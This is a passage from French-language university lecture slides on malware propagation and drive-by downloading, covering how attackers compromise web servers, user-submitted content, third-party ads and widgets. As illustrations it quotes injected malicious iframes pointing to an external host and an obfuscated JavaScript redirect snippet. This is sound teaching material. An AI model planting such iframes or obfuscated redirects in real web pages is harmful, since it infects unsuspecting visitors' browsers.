Upload
others
View
1
Download
0
Embed Size (px)
Citation preview
Jean-Marc Robert, ETS Logiciels malveillants - A112
Plan de présentation
Logiciels malveillants
Amateurs
Professionnels
Propagation: Push model versus Pull model
Nouveau modèle de propagation: Drive-by downloading
Phase I: Compromettre un site web
Phase II: Exploiter une vulnérabilité
Jean-Marc Robert, ETS Logiciels malveillants - A113
Logiciels malveillants: Premières
générations
L’œuvre d’amateurs cherchant à démontrer leurs compétences
techniques.
Publicité, reconnaissance, …
Traditionnellement, l’objectif de ces logiciels malveillants était
de se propager sur le plus de systèmes possible.
Occasionnellement, ces logiciels cherchaient à détruire les systèmes
infectés.
Jean-Marc Robert, ETS Logiciels malveillants - A114
Logiciels malveillants: Nouvelles
générations
L’œuvre de professionnels cherchant à monnayer leurs activités
illicites.
L’objectif de ces nouveaux logiciels malveillants est de compro-
mettre le plus de systèmes possible afin de maximiser les profits
tout en demeurant le plus discret possible.
Se propager le plus efficacement possible.
Jean-Marc Robert, ETS Logiciels malveillants - A115
Propagation: Push model versus Pull model
Push model
Modèle classique
Le logiciel malveillant (ver) cherche
à se propager à travers le réseau
grâce à une vulnérabilité.
P. ex., Slammer
Le ver est proactif.
Points faibles:
Génération aléatoire de fausses
adresses.
Systèmes protégés par des pare-feu ou
des NATs (adresses privées).
Pull model
Nouveau modèle
Le logiciel malveillant attend que le
système vulnérable « vienne » à lui.
Le système vulnérable est proactif.
Points forts:
Permets de passer outre les pare-feu et
les NATs.
Peut demeurer « invisible » lors de
l’infection.
Jean-Marc Robert, ETS Logiciels malveillants - A116
Propagation: Drive-by downloading
La simple navigation sur le web est maintenant devenue une
activité dangereuse.
Simplement en visitant un site web malicieux, un système
vulnérable peut devenir infecté.
Une recherche effectuée au début de 2007 par une équipe de
chercheurs de Google a démontré que sur 4,5 millions d’URL
ayant été analysées
450,000 URL ont cherché à installer un logiciel malveillant à travers le
fureteur;
700,000 URL ont eu un comportement douteux (non confirmé).
Jean-Marc Robert, ETS Logiciels malveillants - A117
Drive-by downloading – deux préalables
Un site web malicieux distribuant des logiciels malveillants
Simplement en le visitant (pull model)
Un fureteur vulnérable
Jean-Marc Robert, ETS Logiciels malveillants - A118
I – un site web malicieux
Développer un site web malicieux.
Malheureusement, comment attirer les visiteurs.
Compromettre un site existant.
Profiter d’un grand nombre de visiteurs.
Jean-Marc Robert, ETS Logiciels malveillants - A119
Compromettre un site web
Le contenu d’un site web est généralement développé par son
propriétaire.
Cependant, il existe des exceptions notoires:
Publicité provenant de tiers
Information provenant des usagers (p.ex. blogue, forum, …)
Gadgets informatiques (p.ex. compteurs, calendriers, …)
Jean-Marc Robert, ETS Logiciels malveillants - A1110
Compromettre un site web: I – Serveur
Un serveur web est aussi sûr que son application la plus
vulnérable! (maillon le plus faible)
Applications administratives
ssh (attaque massive d’un mot de passe)
Serveur http
Applications (utilisant des langages de script)
Bases de données
Il « suffit » de trouver une vulnérabilité permettant d’accéder
au serveur avec les privilèges de l’administrateur.
Jean-Marc Robert, ETS Logiciels malveillants - A1111
Compromettre un site web: I – Serveur
Une fois que le serveur est compromis, le tour est joué!
Un exemple parmi des milliers possibles:<!-- Copyright Information -->
<div align=’center’ class=’copyright’>Powered by
<a href="http://www.invisionboard.com">Invision PowerBoard</a>
(U)v1.3.1 Final © 2003
<a href=’http://www.invisionpower.com’>IPS, Inc.</a></div>
<iframe src=’http://wsfgfdgrty.net/adv/193/new.php’></iframe>
<iframe src=’http://wsfgfdgrty.net/adv/new.php?adv=193’></iframe>
Chaque iframe ayant été ajouté exploite une vulnérabilité donnée.
Lors du test, 50 binaires malicieux ont infecté le système!
Jean-Marc Robert, ETS Logiciels malveillants - A1112
Compromettre un site web: II – Usagers
Information provenant des usagers (p.ex. blogue, forum, …)
Seulement un sous-ensemble HTML devrait être accepté.
Malheureusement, dû à une mauvaise vérification certains usagers peuvent inclure du code malicieux HTML. Iframe, script, …
Un exemple parmi des milliers possibles:<SCRIPT language=JavaScript>
Function tqzyu(nemz)juyu="lo";sdfwe78="catio";jj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="(’"; awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";olkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re"; jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="’)";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//
</SCRIPT>
location.replace (’’http:/ /videozfree.com’’)"
Jean-Marc Robert, ETS Logiciels malveillants - A1113
Compromettre un site web: III – Publicité
Publicités contrôlées
par des tiers!
Jean-Marc Robert, ETS Logiciels malveillants - A1114
Compromettre un site web: III – Publicité
Web
Fournisseur
publicitaire
Fournisseur
publicitaire
Fournisseur
publicitaire
Javascript
Pouvons-nous faire confiance à un sous-traitant du sous-traitant?
Jean-Marc Robert, ETS Logiciels malveillants - A1115
Compromettre un site web: III – Publicité
Un site de partage vidéo (décembre 2006)
La page web contenait une bannière publicitaire d’une grande
compagnie publicitaire américaine – un premier module Javascript.
Ce premier module générait un deuxième module JavaScript pour
accéder à une autre grande compagnie publicitaire américaine
(2ième).
Ce deuxième module générait un troisième module Javascript pour
accéder à une petite compagnie américaine (3ième) fournissant des
annonces publicitaires en fonction de la région où se retrouve l’usager.
Cette publicité régionale contenait un iframe dans sa page HTML
pointant vers une compagnie publicitaire russe (4ième).
En interprétant cet iframe, le fureteur était redirigé vers une page
(xx.xx.xx.xx/aeijs/) contenant un module Javascript chiffré essayant
d’exploiter de nombreuses vulnérabilités du fureteur afin d’installer
des logiciels malveillants.
Jean-Marc Robert, ETS Logiciels malveillants - A1116
Compromettre un site web: IV – Gadgets
Un gadget informatique est un lien vers un module Javascript
ou un iframe fournissant une fonctionnalité particulière.
Compteur
Calendrier
…
Malheureusement, ces gadgets sont fournis régulièrement par
des entités externes.
Jean-Marc Robert, ETS Logiciels malveillants - A1117
Compromettre un site web: IV – Gadgets
<!-- Begin Stat Basic code -->
<script language="JavaScript"
src="http://m1.stat.xx/basic.js">
</script><script language="JavaScript">
<!--
statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);
// -->
</script> <noscript>
<a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA">
<img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA"
border="0" nosave width="18" height="18"></a></noscript>
<!-- End Stat Basic code -->
Ce gadget devait conserver les statistiques sur le nombre de
visiteurs depuis 2002. Malheureusement, ce gadget est une
source d’infection depuis 2006.
Jean-Marc Robert, ETS Logiciels malveillants - A1118
Compromettre un site web: IV – Gadgets
Un exemple intéressant: iframemoney.org.
Cette “entreprise” paie les webmestres pour qu'ils incluent un
iframe malicieux dans leurs pages web.
En juin 2007, iframemoney.org était en activité depuis octobre
2006 et offrait $7 pour chaque tranche de 10,000 nouveaux
visiteurs.